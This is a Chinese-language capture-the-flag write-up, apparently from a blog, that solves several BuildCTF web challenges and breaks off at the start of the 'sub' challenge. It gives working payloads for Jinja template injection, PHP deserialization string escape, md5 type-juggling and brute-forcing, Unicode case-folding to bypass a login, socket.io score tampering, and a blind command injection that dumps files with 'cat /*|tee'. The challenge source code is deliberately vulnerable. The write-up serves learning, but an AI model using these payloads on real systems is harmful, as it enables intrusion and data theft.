<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">import flask</span><br><span class="line">import os</span><br><span class="line">app = flask.<span class="title function_ invoke__">Flask</span>(__name__)</span><br><span class="line">app.config[<span class="string">&#x27;FLAG&#x27;</span>] = os.<span class="title function_ invoke__">getenv</span>(<span class="string">&#x27;FLAG&#x27;</span>)</span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">&#x27;/&#x27;</span>)</span><br><span class="line">def <span class="title function_ invoke__">index</span>():</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_ invoke__">open</span>(__file__).<span class="title function_ invoke__">read</span>()</span><br><span class="line">@app.<span class="title function_ invoke__">route</span>(<span class="string">&#x27;/redflag/&lt;path:redflag&gt;&#x27;</span>)</span><br><span class="line">def <span class="title function_ invoke__">redflag</span>(redflag):</span><br><span class="line">    def <span class="title function_ invoke__">safe_jinja</span>(payload):</span><br><span class="line">        payload = payload.<span class="title function_ invoke__">replace</span>(<span class="string">&#x27;(&#x27;</span>, <span class="string">&#x27;&#x27;</span>).<span class="title function_ invoke__">replace</span>(<span class="string">&#x27;)&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        blacklist = [<span class="string">&#x27;config&#x27;</span>, <span class="string">&#x27;self&#x27;</span>]</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.<span class="title function_ invoke__">join</span>([<span class="string">&#x27;&#123;&#123;% set &#123;&#125;=None%&#125;&#125;&#x27;</span>.<span class="title function_ invoke__">format</span>(c) <span class="keyword">for</span> c in blacklist])+payload</span><br><span class="line">    <span class="keyword">return</span> flask.<span class="title function_ invoke__">render_template_string</span>(<span class="title function_ invoke__">safe_jinja</span>(redflag))</span><br><span class="line">   </span><br><span class="line"><span class="keyword">return</span> flask.<span class="title function_ invoke__">render_template_string</span>(<span class="title function_ invoke__">safe_jinja</span>(redflag))</span><br></pre></td></tr></table></figure>
<p>这里将redflag进行模块渲染，并且redflag为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/redflag/&lt;path:redflag&gt;</span><br></pre></td></tr></table></figure>
<p>表示我们提交的/redflag/路由下的目录</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = payload.<span class="title function_ invoke__">replace</span>(<span class="string">&#x27;(&#x27;</span>, <span class="string">&#x27;&#x27;</span>).<span class="title function_ invoke__">replace</span>(<span class="string">&#x27;)&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        blacklist = [<span class="string">&#x27;config&#x27;</span>, <span class="string">&#x27;self&#x27;</span>]</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&#x27;&#x27;</span>.<span class="title function_ invoke__">join</span>([<span class="string">&#x27;&#123;&#123;% set &#123;&#125;=None%&#125;&#125;&#x27;</span>.<span class="title function_ invoke__">format</span>(c) <span class="keyword">for</span> c in blacklist])+payload</span><br></pre></td></tr></table></figure>
<p>这里将()置空,并且将config、self的值变为None</p>
<p>如果直接进行常规的ssti就没有办法实现，但是flag写入了app.config[‘FLAG’]</p>
<p>就可以通过</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__&#125;&#125;<span class="comment">//获取所有的变量</span></span><br></pre></td></tr></table></figure>
<p>最后payload</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>].config&#125;&#125; <span class="comment">//获得当前app下的config值</span></span><br></pre></td></tr></table></figure>
<h3 id="Cookie-Factory"><a href="#Cookie-Factory" class="headerlink" title="Cookie_Factory"></a>Cookie_Factory</h3><p>题目给出了源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">const express = require(<span class="string">&#x27;express&#x27;</span>)</span><br><span class="line">const app = express();</span><br><span class="line"></span><br><span class="line">const http = require(<span class="string">&#x27;http&#x27;</span>).Server(app);</span><br><span class="line"></span><br><span class="line">const port = <span class="number">3000</span>;</span><br><span class="line"></span><br><span class="line">const socketIo = require(<span class="string">&#x27;socket.io&#x27;</span>);</span><br><span class="line">const io = socketIo(http);</span><br><span class="line"></span><br><span class="line">let sessions = &#123;&#125;</span><br><span class="line">let errors = &#123;&#125;</span><br><span class="line"></span><br><span class="line">app.use(express.static(__dirname));</span><br><span class="line"></span><br><span class="line">app.get(<span class="string">&#x27;/&#x27;</span>, (req, res) =&gt; &#123;</span><br><span class="line">    res.sendFile(<span class="string">&quot;./index.html&quot;</span>)</span><br><span class="line">&#125;)</span><br><span class="line"></span><br><span class="line">io.on(<span class="string">&#x27;connection&#x27;</span>, (socket) =&gt; &#123;</span><br><span class="line">    sessions[socket.<span class="built_in">id</span>] = <span class="number">0</span></span><br><span class="line">    errors[socket.<span class="built_in">id</span>] = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    socket.on(<span class="string">&#x27;disconnect&#x27;</span>, () =&gt; &#123;</span><br><span class="line">        console.log(<span class="string">&#x27;user disconnected&#x27;</span>);</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    socket.on(<span class="string">&#x27;chat message&#x27;</span>, (msg) =&gt; &#123;</span><br><span class="line">        socket.emit(<span class="string">&#x27;chat message&#x27;</span>, msg);</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    socket.on(<span class="string">&#x27;receivedError&#x27;</span>, (msg) =&gt; &#123;</span><br><span class="line">        sessions[socket.<span class="built_in">id</span>] = errors[socket.<span class="built_in">id</span>]</span><br><span class="line">        socket.emit(<span class="string">&#x27;recievedScore&#x27;</span>, JSON.stringify(&#123;<span class="string">&quot;value&quot;</span>:sessions[socket.<span class="built_in">id</span>]&#125;));</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    socket.on(<span class="string">&#x27;click&#x27;</span>, (msg) =&gt; &#123;</span><br><span class="line">        let json = JSON.parse(msg)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (sessions[socket.<span class="built_in">id</span>] &gt; <span class="number">1e20</span>) &#123;</span><br><span class="line">            socket.emit(<span class="string">&#x27;recievedScore&#x27;</span>, JSON.stringify(&#123;<span class="string">&quot;value&quot;</span>:<span class="string">&quot;FLAG&quot;</span>&#125;));</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (json.value != sessions[socket.<span class="built_in">id</span>]) &#123;</span><br><span class="line">            socket.emit(<span class="string">&quot;error&quot;</span>, <span class="string">&quot;previous value does not match&quot;</span>)</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        let oldValue = sessions[socket.<span class="built_in">id</span>]</span><br><span class="line">        let newValue = Math.floor(Math.random() * json.power) + <span class="number">1</span> + oldValue</span><br><span class="line"></span><br><span class="line">        sessions[socket.<span class="built_in">id</span>] = newValue</span><br><span class="line">        socket.emit(<span class="string">&#x27;recievedScore&#x27;</span>, JSON.stringify(&#123;<span class="string">&quot;value&quot;</span>:newValue&#125;));</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (json.power &gt; <span class="number">10</span>) &#123;</span><br><span class="line">            socket.emit(<span class="string">&#x27;error&#x27;</span>, JSON.stringify(&#123;<span class="string">&quot;value&quot;</span>:oldValue&#125;));</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        errors[socket.<span class="built_in">id</span>] = oldValue;</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">http.listen(port, () =&gt; &#123;</span><br><span class="line">    console.log(`App server listening on $&#123;port&#125;. (Go to http://localhost:$&#123;port&#125;)`);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>其实也没有什么，主要看到给出flag的地方</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (sessions[socket.<span class="built_in">id</span>] &gt; <span class="number">1e20</span>) &#123;</span><br><span class="line">            socket.emit(<span class="string">&#x27;recievedScore&#x27;</span>, JSON.stringify(&#123;<span class="string">&quot;value&quot;</span>:<span class="string">&quot;FLAG&quot;</span>&#125;));</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>
<p>这里如果session的socket.id&gt;1e20就返回flag,但是可以发现为js代码</p>
<p>直接点击抓包就发现，会有一串字符串进行返回</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">42</span>[<span class="string">&quot;click&quot;</span>,<span class="string">&quot;&#123;\&quot;power\&quot;:1,\&quot;value\&quot;:2&#125;&quot;</span>]</span><br></pre></td></tr></table></figure>
<p>这里可以直接通过前端输入函数来实现，将power进行修改，并且</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">socket.<span class="title function_">off</span>(<span class="string">&#x27;error&#x27;</span>); <span class="comment">//直接关闭error函数</span></span><br><span class="line">socket.<span class="title function_">emit</span>(<span class="string">&#x27;click&#x27;</span>, <span class="title class_">JSON</span>.<span class="title function_">stringify</span>(&#123;<span class="string">&quot;power&quot;</span>:<span class="number">1e100</span>, <span class="string">&quot;value&quot;</span>:send.<span class="property">value</span>&#125;)); <span class="comment">//直接修改其值</span></span><br></pre></td></tr></table></figure>
<p>这里也可以通过抓包进行修改</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">42</span>[<span class="string">&quot;click&quot;</span>,<span class="string">&quot;&#123;\&quot;power\&quot;:1e30,\&quot;value\&quot;:1e30&#125;&quot;</span>]</span><br></pre></td></tr></table></figure>
<p>出现这个，继续放包</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">42</span>[<span class="string">&quot;error&quot;</span>,<span class="string">&quot;previous value does not match&quot;</span>]</span><br><span class="line"><span class="number">42</span>[<span class="string">&quot;recievedScore&quot;</span>,<span class="string">&quot;&#123;\&quot;value\&quot;:2.118902775372593e+29&#125;&quot;</span>]</span><br></pre></td></tr></table></figure>
<p>把后面两个进行修改，破坏error函数的修改即可</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">43</span>[<span class="string">&quot;error&quot;</span>,<span class="string">&quot;&#123;\&quot;value\&quot;:2&#125;&quot;</span>]</span><br><span class="line"><span class="number">43</span>[<span class="string">&quot;receivedError&quot;</span>,<span class="string">&quot;recieved&quot;</span>]</span><br></pre></td></tr></table></figure>
<p>再点击一次就可以得flag</p>
<h3 id="Why-so-serials"><a href="#Why-so-serials" class="headerlink" title="Why_so_serials?"></a>Why_so_serials?</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line"></span><br><span class="line"><span class="title function_">error_reporting</span>(<span class="number">0</span>); </span><br><span class="line"></span><br><span class="line"><span class="title function_">highlight_file</span>(__FILE__); </span><br><span class="line"></span><br><span class="line"><span class="title function_">include</span>(<span class="string">&#x27;flag.php&#x27;</span>); </span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Gotham</span>&#123; </span><br><span class="line">    public $Bruce; </span><br><span class="line">    public $Wayne; </span><br><span class="line">    public $crime=<span class="literal">false</span>; </span><br><span class="line">    public <span class="keyword">function</span> <span class="title function_">__construct</span>(<span class="params">$Bruce,$Wayne</span>)&#123; </span><br><span class="line">        $this-&gt;<span class="title class_">Bruce</span> = $Bruce; </span><br><span class="line">        $this-&gt;<span class="title class_">Wayne</span> = $Wayne; </span><br><span class="line">    &#125; </span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="title function_">isset</span>($_GET[<span class="string">&#x27;Bruce&#x27;</span>]) &amp;&amp; <span class="title function_">isset</span>($_GET[<span class="string">&#x27;Wayne&#x27;</span>]))&#123; </span><br><span class="line">    $Bruce = $_GET[<span class="string">&#x27;Bruce&#x27;</span>]; </span><br><span class="line">    $Wayne = $_GET[<span class="string">&#x27;Wayne&#x27;</span>]; </span><br><span class="line"></span><br><span class="line">    $city = <span class="keyword">new</span> <span class="title class_">Gotham</span>($Bruce,$Wayne); </span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_">preg_match</span>(<span class="string">&quot;/joker/&quot;</span>, $Wayne))&#123; </span><br><span class="line">        $serial_city = <span class="title function_">str_replace</span>(<span class="string">&#x27;joker&#x27;</span>, <span class="string">&#x27;batman&#x27;</span>, <span class="title function_">serialize</span>($city)); </span><br><span class="line">        $boom = <span class="title function_">unserialize</span>($serial_city); </span><br><span class="line">        <span class="keyword">if</span>($boom-&gt;crime)&#123; </span><br><span class="line">            echo $flag; </span><br><span class="line">        &#125; </span><br><span class="line">    &#125;<span class="keyword">else</span>&#123; </span><br><span class="line">    echo <span class="string">&quot;no crime&quot;</span>; </span><br><span class="line">    &#125; </span><br><span class="line">&#125;<span class="keyword">else</span>&#123; </span><br><span class="line">    echo <span class="string">&quot;HAHAHAHA batman can&#x27;t catch me!&quot;</span>; </span><br><span class="line">&#125; </span><br></pre></td></tr></table></figure>
<p>这个是一个字符串逃逸的题，只需要将crime变为true即可</p>
<p>首先需要先将crime改为true，然后就可以开始尝试字符串逃逸，先看看需要逃逸的字符串</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;;s:5:&quot;</span>crime<span class="string">&quot;;b:1;&#125;  //19个字符需要吐</span></span><br><span class="line"><span class="string">&lt;?php</span></span><br><span class="line"><span class="string">class Gotham&#123;</span></span><br><span class="line"><span class="string">    public <span class="subst">$Bruce</span>=&quot;</span>aaa<span class="string">&quot;;</span></span><br><span class="line"><span class="string">    public <span class="subst">$Wayne</span>=&quot;</span>aaaa<span class="string">&quot;;</span></span><br><span class="line"><span class="string">    public <span class="subst">$crime</span>=true;</span></span><br><span class="line"><span class="string">&#125; </span></span><br><span class="line"><span class="string">for(<span class="subst">$q</span>=0;<span class="subst">$q</span>&lt;19;<span class="subst">$q</span>++)&#123;</span></span><br><span class="line"><span class="string">   echo &quot;</span>joker<span class="string">&quot;;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">echo &#x27;&lt;br&gt;&#x27;;</span></span><br><span class="line"><span class="string"><span class="subst">$a</span>=new Gotham();</span></span><br><span class="line"><span class="string">echo serialize(<span class="subst">$a</span>);</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">//jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker</span></span><br><span class="line"><span class="string">?Bruce=aa&amp;Wayne=jokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjokerjoker&quot;</span>;s:<span class="number">5</span>:<span class="string">&quot;crime&quot;</span>;b:<span class="number">1</span>;&#125;</span><br></pre></td></tr></table></figure>
<h3 id="ez-md5"><a href="#ez-md5" class="headerlink" title="ez_md5"></a>ez_md5</h3><p>开始需要输入sql语句弱密码进行登入  ffifdyop</p>
<p>进去后直接给源码，这里直接给了提示robots，可以先看看robots.txt有什么</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>); </span><br><span class="line"><span class="comment">///robots </span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>); </span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>); </span><br><span class="line"><span class="variable">$Build</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;a&#x27;</span>]; </span><br><span class="line"><span class="variable">$CTF</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;b&#x27;</span>]; </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_REQUEST</span>) &#123;  </span><br><span class="line">    <span class="keyword">foreach</span>(<span class="variable">$_REQUEST</span> <span class="keyword">as</span> <span class="variable">$value</span>) &#123;  </span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/[a-zA-Z]/i&#x27;</span>, <span class="variable">$value</span>))   </span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;不可以哦！&#x27;</span>);  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$Build</span> != <span class="variable">$CTF</span> &amp;&amp; <span class="title function_ invoke__">md5</span>(<span class="variable">$Build</span>) == <span class="title function_ invoke__">md5</span>(<span class="variable">$CTF</span>)) </span><br><span class="line">&#123; </span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;Build_CTF.com&#x27;</span>]) == <span class="string">&quot;3e41f780146b6c246cd49dd296a3da28&quot;</span>) </span><br><span class="line">    &#123; </span><br><span class="line">        <span class="keyword">echo</span> <span class="variable">$flag</span>; </span><br><span class="line">    &#125;<span class="keyword">else</span> <span class="keyword">die</span>(<span class="string">&quot;再想想&quot;</span>); </span><br><span class="line"></span><br><span class="line">&#125;<span class="keyword">else</span> <span class="keyword">die</span>(<span class="string">&quot;不是吧这么简单的md5都过不去？&quot;</span>); </span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>
<p>robots.txt</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">evel2</span><br><span class="line"><span class="title function_ invoke__">md5</span>(<span class="number">114514</span>xxxxxxx)</span><br></pre></td></tr></table></figure>
<p>这里提示我们去通过爆破，首先第一层可以直接通过数组绕过</p>
<p>下面就是爆破脚本</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">for</span>(<span class="variable">$a</span>=<span class="number">1145140000000</span>;<span class="variable">$a</span>&lt;<span class="number">1145149999999</span>;<span class="variable">$a</span>++)&#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="title function_ invoke__">md5</span>(<span class="variable">$a</span>)==<span class="string">&quot;3e41f780146b6c246cd49dd296a3da28&quot;</span>)&#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="variable">$a</span>;</span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;<span class="comment">//1145146803531</span></span><br></pre></td></tr></table></figure>
<p>最后考虑参数合法直接提交即可</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">a[]=<span class="number">1</span>&amp;b[]=<span class="number">2</span></span><br><span class="line"></span><br><span class="line">Build[CTF.com=<span class="number">1145146803531</span></span><br></pre></td></tr></table></figure>
<h3 id="eazyl0gin"><a href="#eazyl0gin" class="headerlink" title="eazyl0gin"></a>eazyl0gin</h3><p>题目给出源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">router.<span class="title function_ invoke__">post</span>(<span class="string">&#x27;/login&#x27;</span>,function(req,res,next)&#123;</span><br><span class="line">  <span class="keyword">var</span> data = &#123;</span><br><span class="line">    username: <span class="title function_ invoke__">String</span>(req.body.username),</span><br><span class="line">    password: <span class="title function_ invoke__">String</span>(req.body.password)</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">const</span> <span class="variable constant_">md5</span> = crypto.<span class="title function_ invoke__">createHash</span>(<span class="string">&#x27;md5&#x27;</span>);</span><br><span class="line">  <span class="keyword">const</span> <span class="variable constant_">flag</span> = process.env.flag</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span>(data.username.<span class="title function_ invoke__">toLowerCase</span>()===<span class="string">&#x27;buildctf&#x27;</span>)&#123; <span class="comment">//如果将username转为小写强等于buildctf就return</span></span><br><span class="line">    <span class="keyword">return</span> res.<span class="title function_ invoke__">render</span>(<span class="string">&#x27;login&#x27;</span>,&#123;<span class="attr">data</span>:<span class="string">&quot;你不许用buildctf账户登陆&quot;</span>&#125;)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span>(data.username.<span class="title function_ invoke__">toUpperCase</span>()!=<span class="string">&#x27;BUILDCTF&#x27;</span>)&#123;<span class="comment">//如果将username转为大写不是弱等于BUILDCTF就return</span></span><br><span class="line">    <span class="keyword">return</span> res.<span class="title function_ invoke__">render</span>(<span class="string">&#x27;login&#x27;</span>,&#123;<span class="attr">data</span>:<span class="string">&quot;只有buildctf这一个账户哦~&quot;</span>&#125;)</span><br><span class="line">  &#125;</span><br><span class="line">  </span><br><span class="line">  <span class="keyword">var</span> md5pwd = md5.<span class="title function_ invoke__">update</span>(data.password).<span class="title function_ invoke__">digest</span>(<span class="string">&#x27;hex&#x27;</span>)</span><br><span class="line">  <span class="keyword">if</span>(md5pwd.<span class="title function_ invoke__">toLowerCase</span>()!=<span class="string">&#x27;b26230fafbc4b147ac48217291727c98&#x27;</span>)&#123;</span><br><span class="line">    <span class="keyword">return</span> res.<span class="title function_ invoke__">render</span>(<span class="string">&#x27;login&#x27;</span>,&#123;<span class="attr">data</span>:<span class="string">&quot;密码错误&quot;</span>&#125;)</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> res.<span class="title function_ invoke__">render</span>(<span class="string">&#x27;login&#x27;</span>,&#123;<span class="attr">data</span>:flag&#125;)</span><br><span class="line"></span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>
<p>这里其实就主要考一个特性，如果知道了就可以很快写出</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">在Character.<span class="title function_ invoke__">toUpperCase</span>()函数中，字符ı会转变为I，字符ſ会变为S。</span><br><span class="line"> 在Character.<span class="title function_ invoke__">toLowerCase</span>()函数中，字符İ会转变为i，字符K会转变为k。</span><br><span class="line">buıldctf</span><br></pre></td></tr></table></figure>
<p>密码就直接通过md5解密得</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">012346</span></span><br></pre></td></tr></table></figure>
<p>登入即可获取flag</p>
<h3 id="刮刮乐"><a href="#刮刮乐" class="headerlink" title="刮刮乐"></a>刮刮乐</h3><p>如何直接刮到一半时就会提示传参cmd,如果直接进行get传参就有提示</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//不对哦，你不是来自baidu.com的自己人哦</span></span><br></pre></td></tr></table></figure>
<p>所以需要添加请求头</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Referer: baidu.com</span><br></pre></td></tr></table></figure>
<p>其实这个是一个无回显rce，打无回显一般就三个思路，首先可以尝试是否可以将命令结果写入文件进行回显，否则出网就可以通过反弹shell来查看结果，还可以通过内存马来回显</p>
<p>这个题就可以通过第一种方法，并且环境不出网</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ls&gt;&gt;<span class="number">1</span>.txt <span class="comment">//这个在这个题是无法写入的</span></span><br><span class="line">cat <span class="comment">/*|tee 1.txt</span></span><br></pre></td></tr></table></figure>
<h3 id="sub"><a href="#sub" class="headerlink" title="sub"></a>sub</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 